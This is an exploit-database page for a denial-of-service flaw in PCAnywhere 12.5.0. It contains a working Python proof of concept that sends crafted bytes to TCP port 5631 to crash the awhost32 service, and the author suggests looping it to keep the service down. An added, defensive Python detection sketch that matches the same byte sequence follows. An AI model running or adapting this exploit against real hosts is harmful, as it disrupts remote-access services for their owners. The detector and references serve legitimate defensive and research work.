PCAnyWhere 12.5.0 build 463 Denial of Service

2012.03.09
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-20


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

#!/usr/bin/python
'''
Exploit Title: PCAnywhere Nuke
Date: 2/16/12
Author: Johnathan Norman spoofy <at> exploitscience.org or @spoofyroot
Version: PCAnyWhere (12.5.0 build 463) and below
Tested on: Windows
Description:

The following code will crash the awhost32 service. It'll be respawned
so if you want to be a real pain you'll need to loop this.. my initial
impressions are that controlling execution will be a pain.
'''

import sys
import socket
import argparse

if len(sys.argv) != 2:
    print "[+] Usage: ./pcNuke.py <HOST>"
    sys.exit(1)

HOST = sys.argv[1]
PORT = 5631

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

# HELLO!
s.send("\x00\x00\x00\x00")
buf = s.recv(1024)

# ACK!
s.send("\x6f\x06\xfe")
buf = s.recv(1024)

# Auth capability part 1
s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")

# Auth capability part 2
s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")
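
Detection sketch for the client byte sequence above, added here as an example and not part of the original advisory or the author's code. It reassembles client-to-server bytes per flow on TCP/5631 and flags flows that begin with the PoC's four messages; the segment record layout, function names and sample traffic are assumptions, and the signature covers only these exact bytes.

```python
from collections import defaultdict

PORT = 5631
# Client messages exactly as they appear in the PoC above.
HELLO = b"\x00\x00\x00\x00"
ACK = b"\x6f\x06\xfe"
AUTH_CAP = b"\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00"
SIGNATURE = HELLO + ACK + AUTH_CAP + AUTH_CAP  # matches this PoC only


def client_streams(segments):
    """Reassemble client-to-server bytes per flow on TCP/5631.
    segments: (src_ip, src_port, dst_port, payload) tuples in capture order;
    this record layout is an assumption, adapt it to your capture tooling.
    """
    streams = defaultdict(bytearray)
    for src_ip, src_port, dst_port, payload in segments:
        if dst_port == PORT:
            streams[(src_ip, src_port)] += payload
    return streams


def find_poc_flows(segments):
    """Return flows whose reassembled client stream starts with SIGNATURE."""
    return sorted(flow for flow, data in client_streams(segments).items()
                  if bytes(data).startswith(SIGNATURE))


# Constructed sample traffic (documentation addresses, not a real capture).
SAMPLE = [
    # Flow 1: the PoC sequence, one send() per segment.
    ("192.0.2.10", 40001, 5631, HELLO),
    ("192.0.2.10", 40001, 5631, ACK),
    ("192.0.2.10", 40001, 5631, AUTH_CAP),
    ("192.0.2.10", 40001, 5631, AUTH_CAP),
    # Flow 2: same bytes, segmented differently by TCP.
    ("192.0.2.11", 40002, 5631, HELLO + ACK[:1]),
    ("192.0.2.11", 40002, 5631, ACK[1:] + AUTH_CAP + AUTH_CAP[:5]),
    ("192.0.2.11", 40002, 5631, AUTH_CAP[5:]),
    # Flow 3: capability message sent once (constructed); must not match.
    ("192.0.2.12", 40003, 5631, HELLO + ACK + AUTH_CAP),
    # Flow 4: same bytes to a different port; ignored.
    ("192.0.2.13", 40004, 8080, SIGNATURE),
]

if __name__ == "__main__":
    for ip, port in find_poc_flows(SAMPLE):
        print(f"PoC byte sequence from {ip}:{port} to TCP/{PORT}")
```

Because the service is respawned after the crash, repeated matches from one source in a short window are worth correlating with awhost32 restarts on the host.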

References:

http://www.securityfocus.com/bid/52094
http://www.exploit-db.com/exploits/18493/



Copyright 2024, cxsecurity.com